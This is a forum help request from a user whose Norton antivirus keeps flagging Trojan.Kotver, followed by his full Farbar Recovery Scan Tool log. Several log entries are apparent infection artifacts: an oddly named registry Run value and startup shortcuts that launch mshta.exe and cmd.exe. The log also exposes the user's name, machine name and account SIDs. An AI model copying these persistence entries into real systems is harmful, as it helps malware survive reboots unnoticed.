Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Trojan.Kotver!gm2 - Need some help!!!


  • This topic is locked This topic is locked
16 replies to this topic

#1 brokus4

brokus4

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 30 October 2016 - 06:41 PM

Hello! I'm glad I found this Forum and I hope someone can help me. Norton is identifying "Trojan.Kotver!gm2" and saying that it will be resolved with a restart, but I restart and run the Quick Scan again and it is still there. I tried to use their Power Eraser product, but it said there was nothing present. So, I found this forum and followed the direction to remove this trojan on my own. The Symantec software said "Trojan.Kotver has not been found on your computer.", so I went on and ran the ESET online scanner and it too said there was no malware present. I once again restarted my computer and did the Norton Quick Scan again and it is telling me that "Trojan.Kotver!gm2" is still present.

 

So, following the instructions, I've downloaded and run the Farbar Recovery Scan Tool. Below is the FRST.txt log file and attached is the Addition.txt file. Can anyone help with this?

 

Thank you in advance!

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-10-2016
Ran by Harold (administrator) on FAMILY-HP (30-10-2016 18:31:56)
Running from C:\Users\Harold\Desktop
Loaded Profiles: Harold & DefaultAppPool (Available Profiles: Harold & Sue & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 9 Organizer\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
() C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\SeagateManager\Sync\FreeAgentService.exe
(Garmin Ltd. or its subsidiaries) C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\n360.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
() C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpert.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\n360.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
() C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe
(Spotify Ltd) C:\Users\Harold\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Dropbox, Inc.) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
(Seagate LLC) C:\Program Files (x86)\Seagate\SeagateManager\FreeAgent Status\stxmenumgr.exe
(iSkySoft) C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe
(Seagate Technology LLC) C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
() C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [611896 2010-09-15] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [497648 2010-07-29] (Adobe Systems Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-07] (Apple Inc.)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-22] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\nvspcap64.dll [1859936 2016-01-22] (NVIDIA Corporation)
HKLM\...\Run: [GoPro Tray App] => C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe [1088944 2016-05-12] ()
HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54576 2008-12-08] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HP Remote Solution] => C:\Program Files (x86)\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe [656896 2009-08-24] (Hewlett-Packard)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [MaxMenuMgr] => C:\Program Files (x86)\Seagate\SeagateManager\FreeAgent Status\StxMenuMgr.exe [185640 2009-05-01] (Seagate LLC)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [658424 2011-05-06] (PDF Complete Inc)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft)
HKLM-x32\...\Run: [DelaypluginInstall] => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1563424 2016-04-05] (Seagate Technology LLC)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Spotify Web Helper] => C:\Users\Harold\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1199000 2013-02-26] (Spotify Ltd)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Dropbox Update] => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2016-04-05] (Seagate Technology LLC)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2736128 2010-11-22] (Hewlett-Packard Company)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\PhotoScreensaver.scr [572416 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt.1.0.dll [2016-10-24] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snapfish PictureMover.lnk [2011-03-05]
ShortcutTarget: Snapfish PictureMover.lnk -> C:\Program Files (x86)\PictureMover\Bin\PictureMover.exe (Hewlett-Packard Company)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
ShortcutTarget: ae5a3b.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
ShortcutTarget: d433f5.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-10-29]
ShortcutTarget: Dropbox.lnk -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{4749b311-6a08-4bf2-9356-27fee05b93a1}: [DhcpNameServer] 209.18.47.61 209.18.47.62

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=21.6.0.32
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK/1
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NSBU&chn=1000&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll [2015-03-03] (Oracle Corporation)
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll [2015-03-03] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
DPF: HKLM-x32 {BEA7310D-06C4-4339-A784-DC3804819809} hxxp://images3.pnimedia.com/ProductAssets/costcous/activex/v3_0_0_7/PhotoCenter_ActiveX_Control.cab
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File

FireFox:
========
FF ProfilePath: C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default [2016-10-30]
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Homepage: Mozilla\Firefox\Profiles\be2mjg6m.default -> hxxp://www.yahoo.com/
FF Extension: (20-20 3D Viewer - WEB) - C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\Extensions\2020Player_WEB@2020Technologies.com [2014-08-01] [not signed]
FF Extension: (Garmin Communicator) - C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\Extensions\{195A3098-0BD5-4e90-AE22-BA1C540AFD1E} [2016-05-01]
FF Extension: (Java Console) - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2016-10-23] [not signed]
FF Extension: (Java Console) - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2016-10-23] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon [2016-10-16]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.0.124\coFFAddon
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_205.dll [2016-10-29] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_205.dll [2016-10-29] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2012-05-01] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\dtplugin\npDeployJava1.dll [2015-03-03] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll [2015-03-03] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-13] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-16]
